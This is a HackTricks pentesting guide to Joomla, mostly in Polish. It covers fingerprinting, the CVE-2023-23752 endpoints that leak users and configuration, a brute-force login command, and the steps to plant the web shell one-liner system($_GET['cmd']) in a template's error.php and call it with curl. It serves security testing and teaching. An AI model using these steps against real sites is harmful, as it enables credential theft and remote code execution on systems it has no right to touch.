6.4 KiB
Joomla
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Statystyki Joomla
Joomla zbiera anonimowe statystyki użycia, takie jak podział wersji Joomla, PHP oraz wersji baz danych i systemów operacyjnych serwerów używanych w instalacjach Joomla. Te dane można zapytać za pośrednictwem ich publicznego API.
curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool
{
"data": {
"cms_version": {
"3.0": 0,
"3.1": 0,
"3.10": 6.33,
"3.2": 0.01,
"3.3": 0.02,
"3.4": 0.05,
"3.5": 12.24,
"3.6": 22.85,
"3.7": 7.99,
"3.8": 17.72,
"3.9": 27.24,
"4.0": 3.21,
"4.1": 1.53,
"4.2": 0.82,
"4.3": 0,
"5.0": 0
},
"total": 2951032
}
}
Enumeration
Discovery/Footprinting
- Sprawdź meta
curl https://www.joomla.org/ | grep Joomla | grep generator
<meta name="generator" content="Joomla! - Open Source Content Management" />
- robots.txt
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
[...]
- README.txt
1- What is this?
* This is a Joomla! installation/upgrade package to version 3.x
* Joomla! Official site: https://www.joomla.org
* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging
Wersja
- W /administrator/manifests/files/joomla.xml możesz zobaczyć wersję.
- W /language/en-GB/en-GB.xml możesz uzyskać wersję Joomla.
- W plugins/system/cache/cache.xml możesz zobaczyć przybliżoną wersję.
Automatyczny
droopescan scan joomla --url http://joomla-site.local/
In 80,443 - Metodologia Pentestingu Web to sekcja o skanerach CMS które mogą skanować Joomla.
Ujawnienie informacji bez uwierzytelnienia API:
Wersje od 4.0.0 do 4.2.7 są podatne na ujawnienie informacji bez uwierzytelnienia (CVE-2023-23752), które ujawnia dane uwierzytelniające i inne informacje.
- Użytkownicy:
http://<host>/api/v1/users?public=true
- Plik konfiguracyjny:
http://<host>/api/index.php/v1/config/application?public=true
Moduł MSF: scanner/http/joomla_api_improper_access_checks
lub skrypt ruby: 51334
Atak Brute-Force
Możesz użyć tego skryptu aby spróbować przeprowadzić atak brute force na logowanie.
sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
admin:admin
RCE
Jeśli udało ci się zdobyć dane logowania administratora, możesz uzyskać RCE w jego obrębie, dodając fragment kod PHP, aby uzyskać RCE. Możemy to zrobić, dostosowując szablon.
- Kliknij na
Templates
w lewym dolnym rogu podConfiguration
, aby otworzyć menu szablonów. - Kliknij na nazwę szablonu. Wybierzmy
protostar
w nagłówku kolumnyTemplate
. To przeniesie nas na stronęTemplates: Customise
. - Na koniec możesz kliknąć na stronę, aby otworzyć źródło strony. Wybierzmy stronę
error.php
. Dodamy PHP one-liner, aby uzyskać wykonanie kodu w następujący sposób: system($_GET['cmd']);
- Zapisz i zamknij
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
Od XSS do RCE
- JoomSploit: Skrypt do eksploatacji Joomla, który podnosi XSS do RCE lub inne krytyczne luki. Więcej informacji znajdziesz w tym poście. Oferuje wsparcie dla wersji Joomla 5.X.X, 4.X.X i 3.X.X oraz pozwala na:
- Podniesienie uprawnień: Tworzy użytkownika w Joomla.
- (RCE) Edycja wbudowanych szablonów: Edytuje wbudowane szablony w Joomla.
- (Custom) Niestandardowe exploity: Niestandardowe exploity dla wtyczek Joomla innych firm.
{% hint style="success" %}
Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Wsparcie dla HackTricks
- Sprawdź plany subskrypcyjne!
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.